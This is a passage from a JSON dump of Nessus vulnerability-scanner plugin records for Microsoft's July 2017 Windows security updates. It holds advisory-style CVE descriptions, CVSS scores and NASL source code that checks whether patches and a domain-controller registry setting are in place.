share);\n\nvuln = FALSE;\n\n# CVE-2017-8563 applies to both OSes and a\n# registry key is required if the target is\n# a domain controller.\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# Is target a DC?\nret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType\"\n);\n\nif (!isnull(ret) && ret == 'LanmanNT')\n{\n # Target is a DC.\n # Does target have required key for CVE-2017-8563 fix?\n ret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters\\LdapEnforceChannelBinding\"\n );\n if (isnull(ret) || (ret != '1' && ret != '2'))\n {\n vuln = TRUE;\n reg_key_note =\n '\\n The registry key \"SYSTEM\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\LdapEnforceChannelBinding\"' +\n '\\n is missing or is not equal to \"1\" or \"2\"' +\n '\\n';\n hotfix_add_report(reg_key_note, bulletin:bulletin);\n }\n}\n\nRegCloseKey(handle:hklm);\nclose_registry(close:FALSE);\n\n\n# Windows 8.1 / Windows Server 2012 R2\nif ( smb_check_rollup(os:\"6.3\", sp:0, rollup_date: \"07_2017\", bulletin:bulletin, rollup_kb_list:[4025333, 4025336]) || vuln)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:44:04", "description": "The remote Windows host is missing security update 4025337\nor cumulative update 4025341. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8467)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8556)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8573)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8577)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8578)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8580)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-11T00:00:00", "title": "Windows 7 and Windows Server 2008 R2 July 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8565", "CVE-2017-8467", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUL_4025341.NASL", "href": "https://www.tenable.com/plugins/nessus/101367", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101367);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/03 11:35:09\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8573\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8587\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\"\n );\n script_bugtraq_id(\n 99387,\n 99389,\n 99394,\n 99396,\n 99398,\n 99400,\n 99402,\n 99409,\n 99413,\n 99414,\n 99416,\n 99419,\n 99421,\n 99423,\n 99424,\n 99425,\n 99427,\n 99428,\n 99429,\n 99431,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4025341\");\n script_xref(name:\"MSFT\", value:\"MS17-4025341\");\n script_xref(name:\"MSKB\", value:\"4025337\");\n script_xref(name:\"MSFT\", value:\"MS17-4025337\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 July 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4025337\nor cumulative update 4025341. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8467)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8556)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8573)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8577)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8578)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8580)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\");\n # https://support.microsoft.com/en-us/help/4025337/windows-7-update-kb4025337\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9d2f3807\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4025337 or Cumulative update KB4025341.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-07';\nkbs = make_list(\"4025341\", \"4025337\");\nvuln = FALSE;\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB only applies to Window 7 / 2008 R2, SP1\nif (hotfix_check_sp_range(win7:'1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# CVE-2017-8563 applies to both OSes and a\n# registry key is required if the target is\n# a domain controller.\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# Is target a DC?\nret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType\"\n);\n\nif (!isnull(ret) && ret == 'LanmanNT')\n{\n # Target is a DC.\n # Does target have required key for CVE-2017-8563 fix?\n ret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters\\LdapEnforceChannelBinding\"\n );\n if (isnull(ret) || (ret != '1' && ret != '2'))\n {\n vuln = TRUE;\n reg_key_note =\n '\\n The registry key \"SYSTEM\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\LdapEnforceChannelBinding\"' +\n '\\n is missing or is not equal to \"1\" or \"2\"' +\n '\\n';\n hotfix_add_report(reg_key_note, bulletin:bulletin);\n }\n}\n\nRegCloseKey(handle:hklm);\nclose_registry(close:FALSE);\n\nif (\n # Windows 7 / 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"07_2017\", bulletin:bulletin, rollup_kb_list:[4025341, 4025337])\n)\n vuln = TRUE;\n\nif (vuln)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:44:08", "description": "The remote Windows host is missing security update 4025343\nor cumulative update 4025331. It is, therefore, affected by\nmultiple vulnerabilities :\n\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8467)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8556)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in the\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8573)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8577)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8578)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8580)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8607)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8610)", "edition": 34, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-11T00:00:00", "title": "Windows Server 2012 July 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8610", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8565", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUL_WIN2012.NASL", "href": "https://www.tenable.com/plugins/nessus/101375", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101375);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8561\",\n \"CVE-2017-8562\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8573\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8587\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8618\"\n );\n script_bugtraq_id(\n 99387,\n 99389,\n 99394,\n 99396,\n 99397,\n 99398,\n 99399,\n 99400,\n 99402,\n 99408,\n 99409,\n 99410,\n 99412,\n 99413,\n 99414,\n 99416,\n 99419,\n 99421,\n 99423,\n 99424,\n 99425,\n 99426,\n 99427,\n 99428,\n 99429,\n 99431,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4025331\");\n script_xref(name:\"MSFT\", value:\"MS17-4025331\");\n script_xref(name:\"MSKB\", value:\"4025343\");\n script_xref(name:\"MSFT\", value:\"MS17-4025343\");\n\n script_name(english:\"Windows Server 2012 July 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4025343\nor cumulative update 4025331. It is, therefore, affected by\nmultiple vulnerabilities :\n\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8467)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8556)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in the\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An 